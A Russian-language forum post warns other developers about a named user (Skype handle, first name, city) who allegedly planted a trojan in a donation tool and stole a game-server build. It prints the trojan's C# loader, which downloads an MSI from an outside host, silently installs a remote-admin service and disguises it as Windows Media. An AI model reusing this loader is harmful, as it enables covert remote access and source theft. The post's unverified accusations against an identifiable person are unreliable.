Буду краток т.к. не мастак писать малявы на людей.
Остерегайтесь любых контактов с юзером под ником Hitter (Ник в скайпе), логин в скайпе bluefoxe, Звать если не ошибаюсь Ольга далее Hitter.
В чем суть, Hitter сама вышла с нами на контакт предложил довольно щедрое финансирование нашей команды в замен на компил сборки ежемесячно и описание фиксов для своего локального сервера в своем городе если не ошибаюсь Норильск, внешка там дорогая у людей свобода только в локалке.
Ну мы взвесив все за и против тем более что локалка и были люди которые поручились за человека как надежного мы согласились.
Началось все с того что Hitter задержала оплату хотя исправно требовал фиксы, мы занимались работой под которую не подписывались и изначально было оговорено чем мы будем заниматься, а чем нет - это просмотр багфиксов на ее форуме, какие-то побочные работы по настройке сервера и сайта, и пр. Все это полностью было оговорено и лежало на плечах кидалы.
Не буду расписывать без надобности очень много подробностей ибо будет много текста...
Все закончилось тем что в очередной раз Hitter попросила сначала ANZO (видно с ним не проканало т.к. он сейчас весь в работе и редко делает то что не касается нашего сервера или его работы), потом Bacek'a чтобы он проверил очередной сервис Hitter по работе с донатом на сервере, это самописная на сях (как сказала Hitter) программа которая работала через телнет, но не в этом суть.
Самое странное в этой истории было следующее, Hitter сказала ANZO что эту программу писала сама от и до, но что-то не получается..., Ваську сказала что эту программу писал ее брат или друг, точно не помню. Т.к. до разбора полетов мы небыли в курсе что Hitter уже начала действовать за спинами наших коллег мы доверились и взялись помочь, как оказалось позже в эту софтину был зашит "троян", хотя трояном это сложно назвать т.к. это легальная софтинка которая не палится антивирусниками никак абсолютно, метод очень изящный т.к. заключается в том чтобы впарить кому угодно софтину чтобы тот ее запустил, чистая социальная инженерия.
if (new FileInfo("C:\\Windows\\System32\\WindowsUpdate.msi").Exists)
return;
new WebClient().DownloadFile("http://meinkun.ru/data/WindowsUpdate.msi", "C:\\Windows\\System32\\WindowsUpdate.msi");
MainWindow.start("cmd.exe", "/C chcp 1251");
MainWindow.start("cmd.exe", "/C MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress");
MainWindow.start("cmd.exe", "/C MsiExec /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress");
MainWindow.start("cmd.exe", "/C ping 127.0.0.1");
MainWindow.start("cmd.exe", "/C MsiExec /I C:\\Windows\\System32\\WindowsUpdate.msi /qn");
MainWindow.start("cmd.exe", "/C reg delete HKCR\\Installer\\Products\\C4EFB40B11F78D94DAEF6897938D68AF /f");
MainWindow.start("cmd.exe", "/C attrib +s +h +r %systemroot%\\System32");
MainWindow.start("cmd.exe", "/C sc config RManService displayname=Windows Media");
MainWindow.start("cmd.exe", "/C sc description RManService Windows Media alloy media files downloads");
MainWindow.start("cmd.exe", "/C sc config RManService start=auto");
Code: C#
В тихом режиме разворачивается что-то типа радмина и в реестре прописываются ключи доступа которые задал "хакер".
Т.к. большинство из нас в то время работал на износ почти 24\7 не смотря на работу и прочий досуг компьютеры не выключались, чем собственно и воспользовалась Hitter.
Пока все спали был стянут сурс с компа одного из разработчиков нашей команды.
Тогда мы еще не подозревали Hitter в том что это все по ее вине или даже что это Hitter была замешана. Начали разбор полетов и выяснилось что "трой" был зашит в одну из библиотек как раз таки того менеджера по работе с донатом. Т.к. у нас нет привычки качать с енета всякий шлак и запускать его без проверки как минимум анубиса и вирустотала.
После этого случая оплата услуг назовем это так стали затягиваться еще сильнее мы уже практически были готовы сказать что либо оплата вовремя либо досвидос рассказали о том что случилось.
Не буду вдаваться в подробности снова, Hitter все отрицала... Ну конечно
Посочувствовали друг другу и приступили дальше все пилить. Каплей всему этому стало то что вдруг в енете всплывает проект dragonwind
На сборке копия нашей и о чудо, присваивают себе наш труд, ну то бог с ним бывает, сами виноваты...
Через некоторое время Hitter снова активизировалась и начала нам ставить ультиматумы и прочее для нас это стало последней каплей при том что с оплатой труда было совсем худо и из заявленной суммы там просрочка была внушительная по сумме. В итоге поругавшись мы таки сказали досвидос...
И что мы видим через несколько дней? На форуме dragonwind появился ник Hitter которая как не странно Администратор
Ну тут все встало на своя места, картина развернулась в полной мере. Весь этот цирк про финансирование был лишь отмазкой чтобы втереться в доверие (вспоминаем про социальную инженерию) и стянуть то что достигалось кровью и потом не один год тяжелой работы.
Hitter как человек на мой взгляд не нормальный и неуравновешенный, хотя бы потому что клялся своим ребенком, что сервер не ее и что она не имеет никакого отношения к проекту драгонвинд.
Скрин переписки чтобы было над чем задуматься на сколько человек ненормальный чтобы клясться ребенком и потом же нарушать свою клятву, слова словами, а они имеют свою силу.
Любые слова сказанные я могу подтвердить перепиской из скайпа.
Что могу посоветовать чтобы не попадаться на такие вещи вам. Никогда не соглашайтесь на доп работы за просто так, которые ранее небыли оговорены, не по доброте душевной, никак вообще. Не запускайте софт который дает клиент без предварительной проверки или запускайте на отдельной машине подальше от проектов или вовсе на виртуалке.
И пусть ваши проекты бережет компьютерный бог.
